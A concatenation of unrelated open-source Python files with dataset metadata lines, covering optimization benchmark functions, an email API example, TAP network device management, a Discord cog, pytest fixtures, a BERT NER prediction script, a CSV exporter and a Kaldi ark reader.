    """Jump, with a discretization by 5 with 4 thresholds (quantiles of Gaussian)."""
    return _jump(discretization.threshold_discretization(y, 5))

@registry.register_with_info(no_transfrom=True)
def hardleadingones5(y: np.ndarray) -> float:
    """Leadingones, with a discretization by 5 with 4 thresholds (quantiles of Gaussian)."""
    return _leadingones(discretization.threshold_discretization(y, 5))
# Softmax-discretized variants: each continuous variable is expanded into one
# weight per discrete value, hence the dimension multiplication noted below.
@registry.register_with_info(no_transfrom=True)
def onemax(y: np.ndarray) -> float:
    """Softmax discretization of onemax (This multiplies the dimension by 2)."""
    return _onemax(discretization.softmax_discretization(y))
@registry.register_with_info(no_transfrom=True)
def jump(y: np.ndarray) -> float:
    """Softmax discretization of jump (This multiplies the dimension by 2)."""
    return _jump(discretization.softmax_discretization(y))
@registry.register_with_info(no_transfrom=True)
def leadingones(y: np.ndarray) -> float:
    """Softmax discretization of leadingones (This multiplies the dimension by 2)."""
    return _leadingones(discretization.softmax_discretization(y))
@registry.register_with_info(no_transfrom=True)
def onemax5(y: np.ndarray) -> float:
    """Softmax discretization of onemax with 5 possibles values.
    This multiplies the dimension by 5."""
    return _onemax(discretization.softmax_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def jump5(y: np.ndarray) -> float:
    """Softmax discretization of jump with 5 possibles values.
    This multiplies the dimension by 5."""
    return _jump(discretization.softmax_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def leadingones5(y: np.ndarray) -> float:
    """Softmax discretization of leadingones with 5 possibles values.
    This multiplies the dimension by 5."""
    return _leadingones(discretization.softmax_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def genzcornerpeak(y: np.ndarray) -> float:
    """One of the Genz functions, originally used in integration,
    tested in optim because why not."""
    base = float(1 + np.mean(np.tanh(y)))
    if base == 0:
        # Guard against raising zero to a negative power.
        return float("inf")
    exponent = -len(y) - 1
    return base ** exponent
@registry.register_with_info(no_transfrom=True)
def minusgenzcornerpeak(y: np.ndarray) -> float:
    """One of the Genz functions, originally used in integration,
    tested in optim because why not."""
    # Simple negation of genzcornerpeak.
    return -float(genzcornerpeak(y))
@registry.register
def genzgaussianpeakintegral(x: np.ndarray) -> float:
    """One of the Genz functions, originally used in integration,
    tested in optim because why not."""
    # Gaussian bump: exp(-sum(x_i^2)/4), maximal (1.0) at the origin.
    return float(np.exp(-np.sum(x**2 / 4.)))
@registry.register
def minusgenzgaussianpeakintegral(x: np.ndarray) -> float:
    """One of the Genz functions, originally used in integration,
    tested in optim because why not.

    Negative counterpart of genzgaussianpeakintegral.
    """
    # Use np.sum (the sibling used it too); the builtin sum only reduces the
    # first axis, so float() would fail on multi-dimensional input.
    return -float(np.exp(-np.sum(x**2 / 4.)))
@registry.register
def slope(x: np.ndarray) -> float:
    """Linear slope: the sum of all coordinates.

    Returns a plain Python float for consistency with the other registered
    functions (the original returned a numpy scalar via the builtin sum).
    """
    return float(np.sum(x))
@registry.register
def linear(x: np.ndarray) -> float:
    # Depends only on the first coordinate, squashed through tanh.
    return float(np.tanh(x[0]))
# Styblinski-Tang variants at increasing noise levels; the actual computation
# lives in the file-local helper _styblinksitang.
@registry.register
def st0(x: np.ndarray) -> float:
    """Styblinksitang function with 0 noise."""
    return _styblinksitang(x, 0)
@registry.register
def st1(x: np.ndarray) -> float:
    """Styblinksitang function with noise 1."""
    return _styblinksitang(x, 1)
@registry.register
def st10(x: np.ndarray) -> float:
    """Styblinksitang function with noise 10."""
    return _styblinksitang(x, 10)
@registry.register
def st100(x: np.ndarray) -> float:
    """Styblinksitang function with noise 100."""
    return _styblinksitang(x, 100)
| 2.515625 | 3 |
examples/live_sowemail_example.py | SoWeMail/sowerest-python | 0 | 12797560 | <gh_stars>0
import os
import sowerest
# Example: send a plain-text email through the SoWeMail REST API.
host = "http://api.sowemail.com:9000"
# API key is read from the environment; None here means the request will
# be sent unauthenticated and presumably rejected by the server.
api_key = os.environ.get('SOWEMAIL_API_KEY')
request_headers = {
    "Authorization": 'Bearer {}'.format(api_key)
}
version = 1
client = sowerest.Client(host=host,
                         request_headers=request_headers,
                         version=version)
# Send email
data = {
    "personalizations": [
        {
            "to": [
                {
                    "email": "<EMAIL>"
                }
            ]
        }
    ],
    "from": {
        "email": "<EMAIL>"
    },
    "subject": "Hello from SoWeMail",
    "content": [
        {
            "type": "text/plain",
            "value": "Simple email sending example using python's sowerest library"
        }
    ]
}
response = client.mail.send.post(request_body=data)
print(response.status_code)
print(response.headers)
print(response.body)
| 2.078125 | 2 |
Super Ugly Number.py | quake0day/oj | 0 | 12797568 | class Solution(object):
def nthSuperUglyNumber(self, n, primes):
"""
:type n: int
:type primes: List[int]
:rtype: int
"""
res = [1]
hashmap = {val:0 for val in primes}
m = [float('inf')] * len(primes)
while len(res) < n:
newm = [res[hashmap[p]] * p for p in primes]
mn = min(newm)
hashmap[primes[newm.index(mn)]] += 1
if mn not in res:
res.append(mn)
else:
continue
return res[-1]
# Quick manual check. print() syntax works on both Python 2 and Python 3;
# the original "print expr" statement is a SyntaxError under Python 3.
a = Solution()
print(a.nthSuperUglyNumber(12, [2, 7, 13, 19]))
mmvmm/tap_device.py | marcsello/mmvmm | 0 | 12797576 | <filename>mmvmm/tap_device.py
#!/usr/bin/env python3
import subprocess
from threading import RLock
class TAPDevice(object):
    """
    This class issues iproute2 commands to add and remove tap devices required for VM networking
    """
    # Class-level registry of device ids currently in use across all instances.
    _allocated_device_ids = []
    NAMING_SCHEME = "tap{id}"
    _global_network_lock = RLock() # protects the _allocated_device_ids list, and the adding and removing of tap devices
    def __init__(self, master: str):
        """Allocate the lowest free tap id, create the device and enslave it to *master*.

        Raises subprocess.CalledProcessError if any `ip` command fails.
        """
        self._active = True
        with TAPDevice._global_network_lock:
            # Linear scan for the lowest unused id.
            self._devid = 0
            while True:
                if self._devid not in TAPDevice._allocated_device_ids:
                    break
                else:
                    self._devid += 1
            TAPDevice._allocated_device_ids.append(self._devid)
            self._devname = TAPDevice.NAMING_SCHEME.format(id=self._devid)
            self._masterdevname = None
            subprocess.check_call(["ip", "tuntap", "add", "name", self._devname, "mode", "tap"])
            subprocess.check_call(["ip", "link", "set", self._devname, "up"])
            try:
                # RLock is reentrant, so update_master may re-acquire it.
                self.update_master(master)
            except subprocess.CalledProcessError:
                # Roll back the partially-created device on failure.
                self.free()
                raise
    def update_master(self, master: str): # This raises exception if master is not available
        """Enslave the tap device to the bridge/master named *master*."""
        if not self._active:
            raise RuntimeError("Device is no longer available")
        with TAPDevice._global_network_lock:
            subprocess.check_call(["ip", "link", "set", self._devname, "master", master])
            self._masterdevname = master
    @property
    def device(self) -> str:
        # Name of the tap device, e.g. "tap0".
        if not self._active:
            raise RuntimeError("Device is no longer available")
        return self._devname
    @property
    def master(self) -> str:
        # Name of the current master device (None until update_master succeeds).
        if not self._active:
            raise RuntimeError("Device is no longer available")
        return self._masterdevname
    def free(self):
        """
        Free up the tap device.
        After calling this function, subsequent calls to the objects should not be made.
        """
        # NOTE(review): if either check_call below raises, the device id stays
        # in _allocated_device_ids and _active remains True — confirm whether
        # cleanup should be wrapped in try/finally.
        if not self._active:
            raise RuntimeError("Device is no longer available")
        with TAPDevice._global_network_lock:
            subprocess.check_call(["ip", "link", "set", self._devname, "down"])
            subprocess.check_call(["ip", "tuntap", "del", "name", self._devname, "mode", "tap"])
            TAPDevice._allocated_device_ids.remove(self._devid)
        self._active = False
| 1.851563 | 2 |
linear/sym1.py | shirai708/qiita | 1 | 12797584 | <gh_stars>1-10
import matplotlib.pyplot as plt
# Semi-implicit (symplectic) Euler integration of dp/dt = -q, dq/dt = p:
# the momentum is updated first and the position uses the *new* momentum.
positions = []
momenta = []
dt = 0.05
position = 1.0
momentum = 0.0
for _ in range(1000):
    momentum -= dt * position
    position += dt * momentum
    momenta.append(momentum)
    positions.append(position)
plt.plot(positions, momenta)
plt.savefig("sym1.png")
| 1.546875 | 2 |
cogs/events.py | est73/cog-example | 0 | 12797592 | from discord.ext import commands
class Events(commands.Cog):
    """Cog holding event listeners for the bot."""
    def __init__(self, bot):
        # Keep a reference to the bot so listeners can inspect its state.
        self.bot = bot
    @commands.Cog.listener()
    async def on_ready(self):
        """Log the bot identity once the connection is established."""
        print('Logged in as')
        print(self.bot.user.name)
        print(self.bot.user.id)
        print('------')
def setup(bot):
    # Extension entry point used by bot.load_extension().
    bot.add_cog(Events(bot))
| 1.445313 | 1 |
tests/test_counter.py | benkrikler/fast-carpenter-github-test | 12 | 12797600 | import numpy as np
import pytest
from fast_carpenter.selection.filters import Counter
@pytest.fixture
def weight_names():
    """Weight branch names used to build the Counter under test."""
    return [
        "EventWeight",
        # "MuonWeight", "ElectronWeight", "JetWeight",
    ]
@pytest.fixture
def counter(weight_names):
    """Fresh Counter built from the standard weight names."""
    return Counter(weight_names)
def test_init(weight_names, full_wrapped_tree):
    """A new Counter starts with zeroed counts."""
    c = Counter(weight_names)
    assert c._weight_names == weight_names
    assert c.counts == (0, 0.0)
    # NOTE: (0.0) is just a float, not a 1-tuple — parentheses alone
    # do not create a tuple.
    assert c._w_counts == (0.0)
def test_increment_mc(counter, full_wrapped_tree):
    """MC increments accumulate the weighted event sum."""
    counter.increment(full_wrapped_tree, is_mc=True)
    n_events = len(full_wrapped_tree)
    expected_weighted_sum = 229.94895935058594
    # expected value is taken from numpy sum, but awkward sum is used
    # the difference is small and due to optimization
    # see https://github.com/scikit-hep/awkward-1.0/issues/1241
    assert counter._w_counts == pytest.approx(np.array([expected_weighted_sum]), 1e-4)
    assert counter.counts == (n_events, pytest.approx(expected_weighted_sum, 1e-4))
def test_increment_data(counter, full_wrapped_tree):
    """For data, the weighted count equals the raw event count."""
    counter.increment(full_wrapped_tree, is_mc=False)
    n_events = len(full_wrapped_tree)
    assert counter._w_counts == (n_events)
    assert counter.counts == (n_events, n_events)
def test_add(counter, full_wrapped_tree):
    """Adding a counter to itself doubles both counts."""
    counter.increment(full_wrapped_tree, is_mc=True)
    counter.add(counter)
    n_events = len(full_wrapped_tree)
    expected_weighted_sum = 229.94895935058594
    # expected value is taken from numpy sum, but awkward sum is used
    # the difference is small and due to optimization
    # see https://github.com/scikit-hep/awkward-1.0/issues/1241
    assert counter._w_counts == pytest.approx((expected_weighted_sum * 2,), 2e-4)
    assert counter.counts == (n_events * 2, pytest.approx(expected_weighted_sum * 2, 2e-4))
def test_increment_without_weights(full_wrapped_tree):
    """With no weight names, the weighted container stays empty."""
    counter = Counter([])
    counter.increment(full_wrapped_tree, is_mc=True)
    n_events = len(full_wrapped_tree)
    with pytest.raises(IndexError):
        assert counter._w_counts[0] == n_events
    assert counter.counts == (n_events, )
| 2.125 | 2 |
pterasoftware/__init__.py | camUrban/PteraSoftware | 68 | 12797608 | <gh_stars>10-100
# ToDo: Update this module's documentation.
"""This package contains all the source code for the Ptera Software.
This package contains the following subpackages:
None
This package contains the following directories:
airfoils: This folder contains a collection of airfoils whose coordinates are
stored in DAT files.
This package contains the following modules:
__init__.py: This module is this package's initialization script.
aerodynamics.py: This module contains vortex class definitions.
functions.py: This module contains functions used by other modules in the
pterasoftware package.
geometry.py: This module contains useful functions that relate to geometry,
and the class definitions for different types of geometries.
meshing.py: This module contains useful functions for creating meshes.
output.py: This module contains useful functions for visualizing solutions to
problems.
movement.py: This module contains the class definitions for the problem's movement.
    operating_point.py: This module contains the class definition for the
    problem's operating point.
problems.py: This module contains the class definitions for different types of
problems.
steady_horseshoe_vortex_lattice_method.py: This module contains the class
definition of this package's steady horseshoe vortex lattice solver.
steady_ring_vortex_lattice_method.py: This module contains the class definition
of this package's steady ring vortex lattice solver.
unsteady_ring_vortex_lattice_method.py: This module contains the class definition
of this package's unsteady ring vortex lattice solver.
"""
import pterasoftware.aerodynamics
import pterasoftware.airfoils
import pterasoftware.geometry
import pterasoftware.meshing
import pterasoftware.movement
import pterasoftware.operating_point
import pterasoftware.output
import pterasoftware.problems
import pterasoftware.steady_horseshoe_vortex_lattice_method
import pterasoftware.steady_ring_vortex_lattice_method
import pterasoftware.unsteady_ring_vortex_lattice_method
| 1.492188 | 1 |
web-component/python/admin_api/api/__init__.py | AbhiGupta03/SDK | 0 | 12797616 | <filename>web-component/python/admin_api/api/__init__.py<gh_stars>0
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from admin_api.api.auto_generate_app_token_api import AutoGenerateAppTokenApi
from admin_api.api.card_api import CardApi
from admin_api.api.client_api import ClientApi | 0.636719 | 1 |
mapfartapi/web.py | aaronr/mapfart | 3 | 12797624 | from flask import render_template
def index():
    """Render the landing page."""
    return render_template('index.html')
def documentation():
    """Render the documentation page."""
    return render_template('documentation.html')
def api_landing():
    """Render the API landing page."""
    return render_template('api_landing.html')
| 0.863281 | 1 |
tests/funcionales/test_formularios.py | cacao-accounting/cacao-accounting-mockup | 2 | 12797632 | <reponame>cacao-accounting/cacao-accounting-mockup<gh_stars>1-10
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contributors:
# - <NAME>
# pylint: disable=redefined-outer-name
import pytest
from cacao_accounting import create_app as app_factory
from cacao_accounting.database import database
from cacao_accounting.datos import base_data, dev_data
@pytest.fixture(scope="module", autouse=True)
def app():
    """Module-scoped Flask app backed by an in-memory SQLite database,
    pre-populated with base and development data."""
    # NOTE(review): SQLITE is imported but unused here — confirm whether it
    # was meant to feed SQLALCHEMY_DATABASE_URI.
    from cacao_accounting.config import SQLITE
    app = app_factory(
        {
            "SECRET_KEY": "<KEY>",
            "SQLALCHEMY_DATABASE_URI": "sqlite://",
            "SQLALCHEMY_TRACK_MODIFICATIONS": False,
            "TESTING": True,
            "WTF_CSRF_ENABLED": False,
            "DEBUG": True,
            "DESKTOPMODE": False,
        }
    )
    with app.app_context():
        database.drop_all()
        database.create_all()
        base_data()
        dev_data()
    app.app_context().push()
    yield app
@pytest.fixture
def elimina_variable_entorno(app):
    """Remove the CACAO_TEST env var (if set) and force production mode."""
    import os
    if os.environ.get("CACAO_TEST"):
        os.environ.pop("CACAO_TEST")
        app.config["ENV"] = "production"
    else:
        pass
@pytest.fixture
def client(app):
    """HTTP test client for the app."""
    return app.test_client()
@pytest.fixture
def runner(app):
    """CLI test runner for the app."""
    return app.test_cli_runner()
class AuthActions:
    """Small helper wrapping login/logout requests for tests."""
    def __init__(self, client):
        self._client = client
    def login(self):
        # Logs in with the development "cacao" account.
        return self._client.post("/login", data={"usuario": "cacao", "acceso": "cacao"})
    def logout(self):
        return self._client.get("/salir")
@pytest.fixture
def auth(client):
    """AuthActions bound to the test client."""
    return AuthActions(client)
def test_formulario_nueva_entidad(client, auth):
    """Creating an entity via the new-entity form persists it in the DB."""
    from cacao_accounting.database import Entidad
    auth.login()
    response = client.get("/accounts/entity/new")
    assert b"Crear Nueva Entidad." in response.data
    entidad = Entidad.query.filter_by(entidad="Test Form").first()
    assert entidad is None
    # NOTE(review): the response is never asserted on; `post` is unused.
    post = client.post(
        "/accounts/entity/new",
        data={
            "nombre_comercial": "Test Form",
            "razon_social": "Test Form",
            "id_fiscal": "Test Form",
            "id": "Test Form",
            "moneda": "NIO",
            "tipo_entidad": "Asociación",
            "correo_electronico": "<EMAIL>",
            "web": "https://cacao.io",
            "telefono1": "+505 8771 0980",
            "telefono2": "+505 8661 2108",
            "fax": "+505 2273 0754",
        },
        follow_redirects=True,
    )
    entidad = Entidad.query.filter_by(entidad="Test Form").first()
    assert entidad is not None
    assert entidad.moneda == "NIO"
    assert entidad.entidad == "Test Form"
def test_formulario_editar_entidad(client, auth):
    """Editing the 'dulce' entity echoes the submitted values in the page."""
    from cacao_accounting.database import Entidad
    auth.login()
    get = client.get("/accounts/entity/edit/dulce")
    assert b"Editar Entidad." in get.data
    post = client.post(
        "/accounts/entity/edit/dulce",
        data={
            "id_fiscal": "J08100000078",
            "nombre_comercial": "<NAME>",
            "razon_social": "Dulces Mundo Sabor Sociedad Anonima",
            "telefono1": "+506 8771 0980",
            "telefono2": "+506 8667 2108",
            "correo_electronico": "<EMAIL>",
            "fax": "+506 7242 2789",
            "web": "candy.org",
        },
        follow_redirects=True,
    )
    assert b"<NAME>" in post.data
    assert b"J08100000078" in post.data
    assert b"Dulces Mundo Sabor Sociedad Anonima" in post.data
    assert b"+506 8771 0980" in post.data
    assert b"+506 8667 2108" in post.data
    assert b"<EMAIL>" in post.data
    assert b"+506 7242 2789" in post.data
    assert b"candy.org" in post.data
    assert b"dulce" in post.data
def test_formulario_nueva_unidad(client, auth):
    """Creating a business unit via the form persists it in the DB."""
    from cacao_accounting.database import Unidad
    auth.login()
    response = client.get("/accounts/unit/new")
    assert b"Crear Nueva Unidad de Negocios." in response.data
    unidad = Unidad.query.filter_by(unidad="Test Form").first()
    assert unidad is None
    # NOTE(review): the POST response itself is never asserted on.
    post = client.post(
        "/accounts/unit/new",
        data={
            "id": "test",
            "nombre": "Test Form",
            "entidad": "cacao",
            "correo_electronico": "<EMAIL>",
            "web": "https://cacao.io",
            "telefono1": "+505 8771 0980",
            "telefono2": "+505 8661 2108",
            "fax": "+505 2273 0754",
        },
    )
    unidad = Unidad.query.filter_by(unidad="test").first()
    assert unidad is not None
    assert unidad.entidad == "cacao"
    assert unidad.unidad == "test"
| 1.570313 | 2 |
clue2020-data-lab/predict_sequence_label.py | dedeguo/knowledge_graph_construction | 0 | 12797640 | #!/usr/bin/python
# coding:utf8
"""
@author: <NAME>
@time: 2019-12-07 20:51
"""
import os
import re
import json
import tensorflow as tf
import tokenization
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
vocab_file = "./vocab.txt"
tokenizer_ = tokenization.FullTokenizer(vocab_file=vocab_file)
label2id = json.loads(open("./label2id.json").read())
id2label = [k for k, v in label2id.items()]
def process_one_example_p(tokenizer, text, max_seq_len=128):
    """Convert raw text into (input_ids, input_mask, segment_ids) for BERT.

    Each character of ``text`` is tokenized individually; the token sequence
    is truncated to ``max_seq_len - 2`` to leave room for the [CLS]/[SEP]
    markers, then all three outputs are zero-padded up to ``max_seq_len``.

    :param tokenizer: object providing ``tokenize`` and
        ``convert_tokens_to_ids`` (e.g. tokenization.FullTokenizer).
    :param text: input string, processed character by character.
    :param max_seq_len: total sequence length including [CLS] and [SEP].
    :return: tuple ``(input_ids, input_mask, segment_ids)``, each a list of
        length ``max_seq_len``.
    """
    tokens = []
    for word in list(text):
        tokens.extend(tokenizer.tokenize(word))
    if len(tokens) >= max_seq_len - 1:
        tokens = tokens[0:(max_seq_len - 2)]
    # [CLS] marks sentence start, [SEP] sentence end; single segment -> all 0.
    ntokens = ["[CLS]"] + tokens + ["[SEP]"]
    segment_ids = [0] * len(ntokens)
    input_ids = tokenizer.convert_tokens_to_ids(ntokens)
    input_mask = [1] * len(input_ids)
    # Zero-pad all three sequences to the fixed length.
    # (The original also padded an unused label_ids list and appended
    # "**NULL**" tokens; both were dead code and have been removed.)
    while len(input_ids) < max_seq_len:
        input_ids.append(0)
        input_mask.append(0)
        segment_ids.append(0)
    assert len(input_ids) == max_seq_len
    assert len(input_mask) == max_seq_len
    assert len(segment_ids) == max_seq_len
    feature = (input_ids, input_mask, segment_ids)
    return feature
def load_model(model_folder):
    """Restore a TF1 checkpoint from *model_folder* and return a live Session.

    Falls back to treating *model_folder* itself as the checkpoint path when
    no checkpoint state file can be read.
    """
    # We retrieve our checkpoint fullpath
    try:
        checkpoint = tf.train.get_checkpoint_state(model_folder)
        input_checkpoint = checkpoint.model_checkpoint_path
        print("[INFO] input_checkpoint:", input_checkpoint)
    except Exception as e:
        input_checkpoint = model_folder
        print("[INFO] Model folder", model_folder, repr(e))
    # We clear devices to allow TensorFlow to control on which device it will load operations
    clear_devices = True
    tf.reset_default_graph()
    # We import the meta graph and retrieve a Saver
    saver = tf.train.import_meta_graph(input_checkpoint + '.meta', clear_devices=clear_devices)
    # We start a session and restore the graph weights
    sess_ = tf.Session()
    saver.restore(sess_, input_checkpoint)
    # opts = sess_.graph.get_operations()
    # for v in opts:
    #     print(v.name)
    return sess_
# Load the NER model once at import time and cache handles to its
# input placeholders and the decoded-label output tensor.
model_path = "./ner_bert_base/"
sess = load_model(model_path)
input_ids = sess.graph.get_tensor_by_name("input_ids:0")
input_mask = sess.graph.get_tensor_by_name("input_mask:0") # is_training
segment_ids = sess.graph.get_tensor_by_name("segment_ids:0") # fc/dense/Relu cnn_block/Reshape
keep_prob = sess.graph.get_tensor_by_name("keep_prob:0")
p = sess.graph.get_tensor_by_name("loss/ReverseSequence_1:0")
def predict(text):
    """Run NER over *text* and decode the BIO/S tag sequence into spans.

    :param text: input sentence (at most 62 characters fit in the model).
    :return: dict mapping entity label -> {entity_text: [[start, end]]}
        with inclusive character offsets into *text*.
    """
    data = [text]
    # Split into chunks of at most 62 characters and predict as one batch
    # (62 content chars + [CLS] + [SEP] = max_seq_len 64).
    features = []
    for i in data:
        feature = process_one_example_p(tokenizer_, i, max_seq_len=64)
        features.append(feature)
    feed = {input_ids: [feature[0] for feature in features],
            input_mask: [feature[1] for feature in features],
            segment_ids: [feature[2] for feature in features],
            keep_prob: 1.0
            }
    [probs] = sess.run([p], feed)
    # Map predicted label ids back to tag strings, skipping the [CLS] slot.
    result = []
    for index, prob in enumerate(probs):
        for v in prob[1:len(data[index]) + 1]:
            result.append(id2label[int(v)])
    print(result)
    # Decode tags into labeled spans. `start` tracks the opening index of the
    # entity currently being read; tags look like "B-LOC", so [2:] is the label.
    # NOTE(review): labels[label][te_] is overwritten on repeated entity text,
    # so only the last occurrence's offsets survive — confirm if intended.
    labels = {}
    start = None
    index = 0
    for w, t in zip("".join(data), result):
        if re.search("^[BS]", t):
            if start is not None:
                label = result[index - 1][2:]
                if labels.get(label):
                    te_ = text[start:index]
                    # print(te_, labels)
                    labels[label][te_] = [[start, index - 1]]
                else:
                    te_ = text[start:index]
                    # print(te_, labels)
                    labels[label] = {te_: [[start, index - 1]]}
            start = index
            # print(start)
        if re.search("^O", t):
            if start is not None:
                # print(start)
                label = result[index - 1][2:]
                if labels.get(label):
                    te_ = text[start:index]
                    # print(te_, labels)
                    labels[label][te_] = [[start, index - 1]]
                else:
                    te_ = text[start:index]
                    # print(te_, labels)
                    labels[label] = {te_: [[start, index - 1]]}
            # else:
            #     print(start, labels)
            start = None
        index += 1
    # Flush a span still open at the end of the sentence.
    if start is not None:
        # print(start)
        label = result[start][2:]
        if labels.get(label):
            te_ = text[start:index]
            # print(te_, labels)
            labels[label][te_] = [[start, index - 1]]
        else:
            te_ = text[start:index]
            # print(te_, labels)
            labels[label] = {te_: [[start, index - 1]]}
    # print(labels)
    return labels
def submit(path):
    """Run NER prediction over a JSON-lines file and write ner_predict.json.

    Each non-empty input line must be a JSON object with a "text" field;
    one JSON object {"label": ...} is written per input line.

    :param path: path to the JSON-lines input file.
    """
    data = []
    # Context managers ensure the files are closed even if predict() raises
    # (the original leaked both file handles).
    with open(path) as infile:
        for line in infile:
            line = line.strip()
            if not line:
                continue
            record = json.loads(line)
            res = predict(record["text"])
            data.append(json.dumps({"label": res}, ensure_ascii=False))
    with open("ner_predict.json", "w") as outfile:
        outfile.write("\n".join(data))
if __name__ == "__main__":
    # Smoke-test a single sentence, then generate predictions for the dev set.
    text_ = "梅塔利斯在乌克兰联赛、杯赛及联盟杯中保持9场不败,状态相当出色;"
    res_ = predict(text_)
    print(res_)
    submit("data/thuctc_valid.json")
| 2.109375 | 2 |
src/compas_occ/geometry/curves/_curve.py | jf---/compas_occ | 1 | 12797648 | from compas.data import Data
class Curve(Data):
    """Base class for all curves in this package."""
    # Intentionally empty: concrete curve types subclass this.
| 0.433594 | 0 |
app/app/util/csv_transformer.py | Oblo-cit-sci/Oblo-backend | 0 | 12797656 | <gh_stars>0
from csv import DictWriter
from datetime import datetime
from typing import List
from app.models.orm import Entry
from app.util.consts import TYPE, NAME, TERMINAL_ASPECT_TYPES, VALUE
# Ordered CSV header columns for a regular entry's metadata.
regular_entry_base_meta_columns = [
    "uuid",
    "creation_ts",
    "domain",
    "template",
    "template_version",
    "type",
    "last_edit_ts",
    "version",
    "title",
    "status",
    "description",
    "language",
    "privacy",
    "license",
    "image",
    "attached_files",
    "actors",
]
# Columns copied from the Entry attribute of the same name without transformation.
straight_grab = [
    "uuid",
    "creation_ts",
    "domain",
    "template_version",
    "type",
    "last_edit_ts",
    "version",
    "title",
    "status",
    "description",
    "language",
    "privacy",
    "license",
    "image",
    "template_version",
]
# Separator between items of a list-valued cell, and between the parts
# of a single composite value.
list_item_sep = "|"
inner_value_sep = ":"
# Per-column value transformers applied before writing the CSV cell.
# NOTE(review): "%Y" keeps only the year of the timestamps — confirm whether
# a full date/time format was intended.
transformer = {
    "uuid": lambda uuid: str(uuid),
    "creation_ts": lambda ts: datetime.strftime(ts, "%Y"),
    "last_edit_ts": lambda ts: datetime.strftime(ts, "%Y"),
    "template": lambda template: template.title,
    "actors": lambda actors: cell_separated(
        list(map(lambda entry_role: entry_role.csv_format(inner_value_sep), actors))
    ),
}
def cell_separated(values: List[str]):
    """Join multiple cell values with the list-item separator."""
    return list_item_sep.join(values)
def transform_to_csv(entry: Entry, template: Entry):
    """Serialize *entry*'s base metadata to CSV text (header + one row).

    NOTE(review): writes a scratch file "t.csv" in the CWD and re-reads it
    (the commented-out tempfile approach "doesn't work atm"); the read handle
    is never closed and the file is left behind. The final loop's result is
    overwritten each iteration and discarded — confirm intended behavior.
    """
    res = {}
    # Debug output of the actors column.
    print(
        cell_separated(
            list(
                map(
                    lambda entry_role: entry_role.csv_format(inner_value_sep),
                    entry.actors,
                )
            )
        )
    )
    # Collect each metadata column, applying the per-column transformer.
    for col in regular_entry_base_meta_columns:
        # if col in straight_grab:
        val = getattr(entry, col)
        if not val:
            val = ""
        if col in transformer:
            val = transformer[col](val)
        res[col] = val
    # temp file method. doesnt work atm
    # fp = tempfile.TemporaryFile()
    # bh = list(map(lambda v: v.encode("utf-8"), regular_entry_base_meta_columns))
    no_t = open("t.csv", "w")
    writer = DictWriter(no_t, regular_entry_base_meta_columns)
    # print(bh)
    # print(writer.fieldnames)
    writer.writeheader()
    writer.writerow(res)
    no_t.close()
    csv_text = open("t.csv").read()
    # temp file method...
    # fp.seek(0)
    # csv_text = fp.read()
    for aspect in template.aspects:
        res = resolve_values(aspect, entry.values[aspect.name])
    return csv_text
def resolve_values(aspect, value):
    """Map a terminal aspect to {aspect_name: raw_value}.

    NOTE(review): non-terminal aspect types fall through and return None
    implicitly — confirm whether recursion into sub-aspects was intended.
    """
    a_name = aspect.get(NAME)
    a_type = aspect[TYPE]
    if a_type in TERMINAL_ASPECT_TYPES:
        return {a_name: value[VALUE]}
| 1.765625 | 2 |
btk20_src/lib/pykaldiarkio.py | musiclvme/distant_speech_recognition | 136 | 12797664 | <reponame>musiclvme/distant_speech_recognition<filename>btk20_src/lib/pykaldiarkio.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Basic classes to read/write a binary Kaldi ark file
"""
import struct, numpy
# Marker for a binary float matrix entry in a Kaldi ark.
BFM_SYM = b'BFM '
# Marker for a binary int-vector entry.
BIV_SYM = b'B'
# Size tag written before each 4-byte integer field.
FEAT_BYTE_SIZE = b'\x04'
NULLC = b'\0'
# RIFF magic at the start of each embedded WAV payload.
WAV_SYM = b'RIFF'
class KaldiArkReader:
    """
    Base class for reading a binary Kaldi ark file
    """
    def __init__(self, store_image=False):
        """
        Constructor of KaldiArkReader
        :params store_image: Every utterance data in the ark file will be kept in RAM if True
        """
        self.arkfp = None          # file object of the currently opened ark
        self.curr_arkfile = None   # path of the currently opened ark
        if store_image == True:# store all the utterance data into image
            self.arkdata = {} # arkdata[ID] = {matrix|vector}
            self.uttids = [] # remember the order of utterance IDs in an ark file
        else:
            self.arkdata = None
            self.uttids = None

    def __enter__(self):
        return self

    def __iter__(self):
        """
        Read each utterance from the ark file and return it
        :returns : Python dictionary that contains the utterance ID as a key and data as a value
        """
        # Fixed: the original raised the NotImplemented *constant*, which is
        # not an exception type and produced a confusing TypeError instead of
        # the intended "override me" error.
        raise NotImplementedError('Implement this')

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()

    def accumulate(self, uttid, dataelem):
        """
        Store all the utterance data into the RAM if this is constructed with store_image = True.
        """
        if self.arkdata is None:
            self.arkdata = {}
            self.uttids = []
        self.arkdata[uttid] = dataelem
        self.uttids.append(uttid)

    def open(self, arkfile):
